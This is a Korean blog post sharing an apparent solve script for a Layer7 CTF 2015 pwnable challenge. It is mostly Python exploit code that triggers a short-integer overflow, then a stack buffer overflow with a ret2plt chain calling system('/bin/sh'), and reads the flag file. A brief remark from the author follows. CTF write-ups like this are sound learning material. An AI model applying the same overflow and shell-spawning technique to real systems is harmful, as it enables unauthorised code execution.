티스토리 뷰
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 | from socket import * from telnetlib import * from struct import pack SERVER = ("prob.layer7.kr", 61616) s = socket(AF_INET, SOCK_STREAM) s.connect(SERVER) t = Telnet() t.sock = s print t.read_until("Password : ") s.send("0z57cr40a2abc34103295de63bb2b36e\n") # send password print t.read_until("people : ") s.send(str(0xFFFF + 1) + "\n") # Short Type integer overflow # unsigned __int16 p = "A" * 320 p += pack("<I", 0x08048570) # system@plt p += pack("<I", 0x44444444) # Dummy p += pack("<I", 0x0804A050) # "/bin/sh" ; string s.send(p + "\n") print s.recv(1024) print s.recv(1024) s.send("cat /home/gbwl/flag\n") print s.recv(1024) print s.recv(1024) | cs |
딱 봐도 Int Overflow문제다 하고 풀려고 했는데 타입이 short이거 못보고 계속 삽질했음
어차피 같은학교라 상도 못받으니 포너블쪽만 다 풀어보려고 했음. own-web은 brop같아서 나중에 풀어보려고함
'Pwnable > CTF' 카테고리의 다른 글
Layer7 CTF 2015 Spil..Spli....SPPPPPIILL (0) | 2015.09.16 |
---|---|
Codegate 2015 Bookstore (0) | 2015.09.14 |
CampCTF 2015 hacker_level exponly (1) | 2015.08.25 |
Inc0gnito 2015 anti-hexray exponly (0) | 2015.08.25 |
0CTF 2015 [FlagGenerator] (2) | 2015.04.16 |
댓글